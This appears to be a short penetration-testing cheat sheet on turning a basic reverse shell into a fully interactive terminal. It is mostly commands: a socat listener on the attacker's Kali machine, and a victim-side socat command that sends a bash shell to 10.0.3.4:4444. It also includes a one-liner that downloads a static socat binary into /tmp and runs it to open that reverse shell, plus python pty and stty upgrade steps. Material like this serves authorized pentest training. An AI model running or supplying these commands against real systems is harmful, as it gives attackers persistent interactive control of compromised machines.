Upgrading Shells

A guide to upgrading shells from Non-interactive to interactive

Python

// python -c 'import pty; pty.spawn("/bin/bash")'

Socat

On Kali ( Attacking Machine)

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim Machine

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

On Victim Machine with no Socat

We will need to download a precompiled binary of socat from https://github.com/andrew-d/static-binaries we can then want to download the chosen binary into a folder that we have read and write control over

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Upgrading with Magic

We can upgrade a shell with "magic" The shell will be fully interactive and have synta The first step is to get the shell while in a bash command prompt (This cannot be done is ZSH...switch the shell with /bin/bash before connecting to the shell)

then upgrade it with the python trick

We then background the shell with ctrl + z

We then issue the commands on our kali machine and make sure to take note of the values as we will need them for input on the victim machine

We then foreground with fg and then enter the commands to reset the console

The commands

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

PreviousPage 1 NextTools & Usage

Last updated 3 years ago

hashtagPython

hashtagSocat

hashtagOn Kali ( Attacking Machine)

hashtagOn Victim Machine

hashtagOn Victim Machine with no Socat

hashtagUpgrading with Magic

hashtagThe commands